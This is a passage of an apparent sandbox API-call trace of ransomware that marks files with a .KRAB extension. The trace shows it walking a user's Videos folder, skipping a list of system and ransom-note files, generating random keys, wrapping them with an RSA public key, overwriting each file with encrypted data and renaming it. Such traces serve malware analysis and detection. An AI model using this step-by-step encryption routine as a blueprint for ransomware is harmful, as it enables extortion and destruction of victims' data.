lpOverlapped=0x0) returned 1 [0098.394] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffe93cf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.394] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x16c31, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x16c31, lpOverlapped=0x0) returned 1 [0098.394] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0098.395] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.398] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.399] CloseHandle (hObject=0x434) returned 1 [0098.399] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.399] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\421-3GjN8PT.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\421-3gjn8pt.swf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\421-3GjN8PT.swf.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\421-3gjn8pt.swf.krab")) returned 1 [0098.400] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.400] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.400] lstrcmpW (lpString1="8t9IfizPiwWNK.avi", lpString2=".") returned 1 [0098.400] lstrcmpW (lpString1="8t9IfizPiwWNK.avi", lpString2="..") returned 1 [0098.400] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="8t9IfizPiwWNK.avi" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\8t9IfizPiwWNK.avi") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\8t9IfizPiwWNK.avi" [0098.400] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.400] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\8t9IfizPiwWNK.avi.KRAB") returned 51 [0098.400] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\8t9IfizPiwWNK.avi") returned 46 [0098.400] lstrlenW (lpString=".avi") returned 4 [0098.400] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.401] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".avi ") returned 5 [0098.401] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.401] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\8t9IfizPiwWNK.avi") returned 46 [0098.401] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\8t9IfizPiwWNK.avi") returned 46 [0098.401] lstrcmpiW (lpString1="8t9IfizPiwWNK.avi", lpString2="desktop.ini") returned -1 [0098.401] lstrcmpiW (lpString1="8t9IfizPiwWNK.avi", lpString2="autorun.inf") returned -1 [0098.401] lstrcmpiW (lpString1="8t9IfizPiwWNK.avi", lpString2="ntuser.dat") returned -1 [0098.401] lstrcmpiW (lpString1="8t9IfizPiwWNK.avi", lpString2="iconcache.db") returned -1 [0098.401] lstrcmpiW (lpString1="8t9IfizPiwWNK.avi", lpString2="bootsect.bak") returned -1 [0098.401] lstrcmpiW (lpString1="8t9IfizPiwWNK.avi", lpString2="boot.ini") returned -1 [0098.401] lstrcmpiW (lpString1="8t9IfizPiwWNK.avi", lpString2="ntuser.dat.log") returned -1 [0098.401] lstrcmpiW (lpString1="8t9IfizPiwWNK.avi", lpString2="thumbs.db") returned -1 [0098.401] lstrcmpiW (lpString1="8t9IfizPiwWNK.avi", lpString2="KRAB-DECRYPT.html") returned -1 [0098.401] lstrcmpiW (lpString1="8t9IfizPiwWNK.avi", lpString2="KRAB-DECRYPT.txt") returned -1 [0098.401] lstrcmpiW (lpString1="8t9IfizPiwWNK.avi", lpString2="CRAB-DECRYPT.txt") returned -1 [0098.401] lstrcmpiW (lpString1="8t9IfizPiwWNK.avi", lpString2="ntldr") returned -1 [0098.401] lstrcmpiW (lpString1="8t9IfizPiwWNK.avi", lpString2="NTDETECT.COM") returned -1 [0098.401] lstrcmpiW (lpString1="8t9IfizPiwWNK.avi", lpString2="Bootfont.bin") returned -1 [0098.401] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.402] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0098.402] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.402] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.403] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.403] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0098.403] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0098.403] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.403] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011238) returned 1 [0098.403] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.404] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.404] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.404] CryptGenRandom (in: hProv=0x1011238, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0098.404] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0098.404] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.404] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0098.405] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0098.405] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.405] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.405] GetLastError () returned 0x0 [0098.405] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0098.405] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0098.405] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0098.406] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0098.406] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.406] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.406] GetLastError () returned 0x0 [0098.406] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0098.406] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0098.406] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\8t9IfizPiwWNK.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\8t9ifizpiwwnk.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0098.406] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0098.407] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0098.407] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x1e43, lpOverlapped=0x0) returned 1 [0098.418] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffe1bd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.418] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1e43, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x1e43, lpOverlapped=0x0) returned 1 [0098.418] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0098.419] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.422] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.424] CloseHandle (hObject=0x434) returned 1 [0098.424] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.425] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\8t9IfizPiwWNK.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\8t9ifizpiwwnk.avi"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\8t9IfizPiwWNK.avi.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\8t9ifizpiwwnk.avi.krab")) returned 1 [0098.425] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.426] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.426] lstrcmpW (lpString1="ACxYn16W6qa lSf.mkv", lpString2=".") returned 1 [0098.426] lstrcmpW (lpString1="ACxYn16W6qa lSf.mkv", lpString2="..") returned 1 [0098.426] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="ACxYn16W6qa lSf.mkv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ACxYn16W6qa lSf.mkv") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ACxYn16W6qa lSf.mkv" [0098.426] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.426] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ACxYn16W6qa lSf.mkv.KRAB") returned 53 [0098.426] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ACxYn16W6qa lSf.mkv") returned 48 [0098.426] lstrlenW (lpString=".mkv") returned 4 [0098.426] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.426] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mkv ") returned 5 [0098.426] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.427] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ACxYn16W6qa lSf.mkv") returned 48 [0098.427] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ACxYn16W6qa lSf.mkv") returned 48 [0098.427] lstrcmpiW (lpString1="ACxYn16W6qa lSf.mkv", lpString2="desktop.ini") returned -1 [0098.427] lstrcmpiW (lpString1="ACxYn16W6qa lSf.mkv", lpString2="autorun.inf") returned -1 [0098.427] lstrcmpiW (lpString1="ACxYn16W6qa lSf.mkv", lpString2="ntuser.dat") returned -1 [0098.427] lstrcmpiW (lpString1="ACxYn16W6qa lSf.mkv", lpString2="iconcache.db") returned -1 [0098.427] lstrcmpiW (lpString1="ACxYn16W6qa lSf.mkv", lpString2="bootsect.bak") returned -1 [0098.427] lstrcmpiW (lpString1="ACxYn16W6qa lSf.mkv", lpString2="boot.ini") returned -1 [0098.427] lstrcmpiW (lpString1="ACxYn16W6qa lSf.mkv", lpString2="ntuser.dat.log") returned -1 [0098.427] lstrcmpiW (lpString1="ACxYn16W6qa lSf.mkv", lpString2="thumbs.db") returned -1 [0098.427] lstrcmpiW (lpString1="ACxYn16W6qa lSf.mkv", lpString2="KRAB-DECRYPT.html") returned -1 [0098.427] lstrcmpiW (lpString1="ACxYn16W6qa lSf.mkv", lpString2="KRAB-DECRYPT.txt") returned -1 [0098.427] lstrcmpiW (lpString1="ACxYn16W6qa lSf.mkv", lpString2="CRAB-DECRYPT.txt") returned -1 [0098.427] lstrcmpiW (lpString1="ACxYn16W6qa lSf.mkv", lpString2="ntldr") returned -1 [0098.427] lstrcmpiW (lpString1="ACxYn16W6qa lSf.mkv", lpString2="NTDETECT.COM") returned -1 [0098.427] lstrcmpiW (lpString1="ACxYn16W6qa lSf.mkv", lpString2="Bootfont.bin") returned -1 [0098.427] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.427] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0098.428] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.428] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.428] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.428] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0098.428] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0098.428] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.429] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0098.429] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.429] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.430] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.430] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0098.430] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0098.430] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.430] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0098.430] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd920) returned 1 [0098.430] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.430] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.431] GetLastError () returned 0x0 [0098.431] CryptDestroyKey (hKey=0xfbd920) returned 1 [0098.431] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0098.431] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10113d0) returned 1 [0098.431] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0098.431] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.431] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.432] GetLastError () returned 0x0 [0098.432] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0098.432] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0098.432] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ACxYn16W6qa lSf.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\acxyn16w6qa lsf.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0098.432] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0098.432] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0098.433] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x11e7e, lpOverlapped=0x0) returned 1 [0098.474] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffee182, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.474] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x11e7e, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x11e7e, lpOverlapped=0x0) returned 1 [0098.474] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0098.474] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.478] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.478] CloseHandle (hObject=0x434) returned 1 [0098.478] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.479] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ACxYn16W6qa lSf.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\acxyn16w6qa lsf.mkv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\ACxYn16W6qa lSf.mkv.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\acxyn16w6qa lsf.mkv.krab")) returned 1 [0098.479] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.480] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.480] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0098.480] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0098.480] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\d2ca4a08d2ca4dee3d.lock" [0098.480] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.480] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 57 [0098.480] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\d2ca4a08d2ca4dee3d.lock") returned 52 [0098.480] lstrlenW (lpString=".lock") returned 5 [0098.480] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.480] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0098.480] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.481] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.481] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.481] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0098.481] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0098.481] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\desktop.ini" [0098.481] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.481] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\desktop.ini.KRAB") returned 45 [0098.481] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\desktop.ini") returned 40 [0098.481] lstrlenW (lpString=".ini") returned 4 [0098.481] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.482] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0098.482] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.482] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\desktop.ini") returned 40 [0098.482] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\desktop.ini") returned 40 [0098.482] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0098.482] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.482] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.482] lstrcmpW (lpString1="DTAVJefrIDMBlRs.mp4", lpString2=".") returned 1 [0098.482] lstrcmpW (lpString1="DTAVJefrIDMBlRs.mp4", lpString2="..") returned 1 [0098.482] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="DTAVJefrIDMBlRs.mp4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\DTAVJefrIDMBlRs.mp4") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\DTAVJefrIDMBlRs.mp4" [0098.482] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.483] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\DTAVJefrIDMBlRs.mp4.KRAB") returned 53 [0098.483] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\DTAVJefrIDMBlRs.mp4") returned 48 [0098.483] lstrlenW (lpString=".mp4") returned 4 [0098.483] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.483] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mp4 ") returned 5 [0098.483] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.483] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\DTAVJefrIDMBlRs.mp4") returned 48 [0098.483] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\DTAVJefrIDMBlRs.mp4") returned 48 [0098.483] lstrcmpiW (lpString1="DTAVJefrIDMBlRs.mp4", lpString2="desktop.ini") returned 1 [0098.483] lstrcmpiW (lpString1="DTAVJefrIDMBlRs.mp4", lpString2="autorun.inf") returned 1 [0098.483] lstrcmpiW (lpString1="DTAVJefrIDMBlRs.mp4", lpString2="ntuser.dat") returned -1 [0098.483] lstrcmpiW (lpString1="DTAVJefrIDMBlRs.mp4", lpString2="iconcache.db") returned -1 [0098.483] lstrcmpiW (lpString1="DTAVJefrIDMBlRs.mp4", lpString2="bootsect.bak") returned 1 [0098.483] lstrcmpiW (lpString1="DTAVJefrIDMBlRs.mp4", lpString2="boot.ini") returned 1 [0098.483] lstrcmpiW (lpString1="DTAVJefrIDMBlRs.mp4", lpString2="ntuser.dat.log") returned -1 [0098.483] lstrcmpiW (lpString1="DTAVJefrIDMBlRs.mp4", lpString2="thumbs.db") returned -1 [0098.483] lstrcmpiW (lpString1="DTAVJefrIDMBlRs.mp4", lpString2="KRAB-DECRYPT.html") returned -1 [0098.484] lstrcmpiW (lpString1="DTAVJefrIDMBlRs.mp4", lpString2="KRAB-DECRYPT.txt") returned -1 [0098.484] lstrcmpiW (lpString1="DTAVJefrIDMBlRs.mp4", lpString2="CRAB-DECRYPT.txt") returned 1 [0098.484] lstrcmpiW (lpString1="DTAVJefrIDMBlRs.mp4", lpString2="ntldr") returned -1 [0098.484] lstrcmpiW (lpString1="DTAVJefrIDMBlRs.mp4", lpString2="NTDETECT.COM") returned -1 [0098.484] lstrcmpiW (lpString1="DTAVJefrIDMBlRs.mp4", lpString2="Bootfont.bin") returned 1 [0098.484] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.484] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10111b0) returned 1 [0098.484] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.485] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.485] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.485] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0098.485] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0098.485] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.485] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, 